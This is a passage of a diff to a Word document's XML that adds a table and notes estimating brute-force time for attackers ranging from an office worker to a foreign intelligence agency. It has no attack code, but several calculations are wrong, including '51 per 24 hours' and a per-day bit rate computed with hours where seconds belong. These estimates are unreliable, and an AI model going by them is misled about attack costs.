+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>$500M</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="1695" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>(</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Bitmain Antminer S21 XP 270TH/s</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>) x 5000</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve"> </w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2044" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>1.1664x10^23 bits per day</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2724" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve">2.91737x10^15 days </w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve">Or </w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t xml:space="preserve">7.99 x 10^12 </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>years</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+            <w:tr>
+              <w:trPr>
+                <w:trHeight w:val="616"/>
+                <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              </w:trPr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Foreign Intelligence Agency</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>$2</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>B</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="1695" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>2 x 2 exaflop supercomputing facilities</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2044" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>3.456x10^23 bits/day</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="2724" w:type="dxa"/>
+                  <w:tcBorders>
+                    <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                    <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+                  </w:tcBorders>
+                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>9.846133 x 10^14 days</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>Or</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t> </w:t>
+                  </w:r>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
+                      <w:color w:val="333333"/>
+                      <w:lang w:eastAsia="en-AU"/>
+                    </w:rPr>
+                    <w:t>2.697x10^12</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+          </w:tbl>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="2082"/>
+              </w:tabs>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Note: N bits of work requires </w:t>
+            </w:r>
+            <m:oMath>
+              <m:sSup>
+                <m:sSupPr>
+                  <m:ctrlPr>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      <w:i/>
+                    </w:rPr>
+                  </m:ctrlPr>
+                </m:sSupPr>
+                <m:e>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                    </w:rPr>
+                    <m:t>2</m:t>
+                  </m:r>
+                </m:e>
+                <m:sup>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                    </w:rPr>
+                    <m:t>N</m:t>
+                  </m:r>
+                </m:sup>
+              </m:sSup>
+            </m:oMath>
+            <w:r>
+              <w:t xml:space="preserve"> bit decisions that need to be completed</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="5"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Asumming after the office worker that the solo teenage hacker and above are able to make one bit decision per clock cycle.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="5"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Assuming brute forcing</w:t>
+            </w:r>
+          </w:p>
           <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Handy Site:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:hyperlink r:id="rId17" w:anchor="date" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://www.cpubenchmark.net/laptop.html#date</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
           <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Office Worker:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Most Common CPU according to is the Ryzen 5: </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId18" w:anchor="cpu-commonality" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://www.cpubenchmark.net/common_cpus.html#cpu-commonality</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
           <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Whilst the office worker has more CPU power, they are being supervised so will be mostly limited by their own time constraints: Hence they are only capable of making 1 decision every 10 minutes. Hence, 51 per 24 Hours.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Solo Teenage Hacker:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>I am assuming that this person will spend approximately 75%</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ($7.5k)</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> of their available funds on the PC equipment. And then the remaining will be on training, skills development and tools. </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> I am assuming by this they will have th</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">e </w:t>
+            </w:r>
+            <w:r>
+              <w:t>computer mostly dedicated or almost full utilisation</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> and under the assumption they are only using a nominal computer elements such as a GPU and/or CPU but not HPC grade components.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>Get something similar to a pretty well upgraded Lenovo P3 Tower- But doesn’t know how to use GPU but can make it multithreaded</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <m:oMath>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                </w:rPr>
+                <m:t>24threads×5.7GHz×24hours≈</m:t>
+              </m:r>
+              <m:f>
+                <m:fPr>
+                  <m:ctrlPr>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      <w:i/>
+                    </w:rPr>
+                  </m:ctrlPr>
+                </m:fPr>
+                <m:num>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                    </w:rPr>
+                    <m:t>3,283,200,000,000</m:t>
+                  </m:r>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                    </w:rPr>
+                    <m:t>bits</m:t>
+                  </m:r>
+                </m:num>
+                <m:den>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                    </w:rPr>
+                    <m:t>day</m:t>
+                  </m:r>
+                </m:den>
+              </m:f>
+            </m:oMath>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Small Business Hacking</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Assuming</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> this business has the resources for 10 people/PCs to simultaneously run through the processes and they are all equivalent to a Lenovo workstation and then have to utilise the 100K for the compute and the infrastructure costs of their network. They will be able to achieve 10 times more.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>Hence:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+            </w:pPr>
+            <m:oMathPara>
+              <m:oMath>
+                <m:f>
+                  <m:fPr>
+                    <m:ctrlPr>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                        <w:i/>
+                      </w:rPr>
+                    </m:ctrlPr>
+                  </m:fPr>
+                  <m:num>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>3,283,200,000,000</m:t>
+                    </m:r>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>bits</m:t>
+                    </m:r>
+                  </m:num>
+                  <m:den>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>day</m:t>
+                    </m:r>
+                  </m:den>
+                </m:f>
+                <m:r>
+                  <w:rPr>
+                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  </w:rPr>
+                  <m:t>×10≈</m:t>
+                </m:r>
+                <m:f>
+                  <m:fPr>
+                    <m:ctrlPr>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                        <w:i/>
+                      </w:rPr>
+                    </m:ctrlPr>
+                  </m:fPr>
+                  <m:num>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
+                      <m:t>3</m:t>
+                    </m:r>
+                    <m:r>
+                      <w:rPr>
+                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                      </w:rPr>
